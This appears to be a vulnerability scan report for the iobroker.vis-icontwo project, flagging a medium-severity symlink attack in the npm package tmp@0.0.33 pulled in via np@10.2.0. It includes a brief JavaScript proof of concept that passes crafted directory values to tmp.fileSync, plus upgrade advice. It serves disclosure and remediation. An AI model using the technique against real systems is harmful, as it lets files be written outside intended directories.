Vulnerabilities

1 via 2 paths

Dependencies

295

Source

GitHub

Commit

a3c526bb

Find, fix and prevent vulnerabilities in your code.

Severity
  • 1
Status
  • 1
  • 0
  • 0

medium severity

Symlink Attack

  • Vulnerable module: tmp
  • Introduced through: np@10.2.0

Detailed paths

  • Introduced through: iobroker.vis-icontwo@inventwo/iobroker.vis-icontwo#a3c526bb5db6e821338f565e03f58bfc23e9ce4c np@10.2.0 listr-input@0.2.1 inquirer@7.3.3 external-editor@3.1.0 tmp@0.0.33
  • Introduced through: iobroker.vis-icontwo@inventwo/iobroker.vis-icontwo#a3c526bb5db6e821338f565e03f58bfc23e9ce4c np@10.2.0 listr-input@0.2.1 inquirer-autosubmit-prompt@0.2.0 inquirer@6.5.2 external-editor@3.1.0 tmp@0.0.33

Overview

Affected versions of this package are vulnerable to Symlink Attack via the dir parameter. An attacker can cause files or directories to be written to arbitrary locations by supplying a crafted symbolic link that resolves outside the intended temporary directory.

PoC

const tmp = require('tmp');

const tmpobj = tmp.fileSync({ 'dir': 'evil-dir'});
console.log('File: ', tmpobj.name);

try {
    tmp.fileSync({ 'dir': 'mydir1'});
} catch (err) {
    console.log('test 1:', err.message)
}

try {
    tmp.fileSync({ 'dir': '/foo'});
} catch (err) {
    console.log('test 2:', err.message)
}

try {
    const fs = require('node:fs');
    const resolved = fs.realpathSync('/tmp/evil-dir');
    tmp.fileSync({ 'dir': resolved});
} catch (err) {
    console.log('test 3:', err.message)
}

Remediation

Upgrade tmp to version 0.2.4 or higher.

References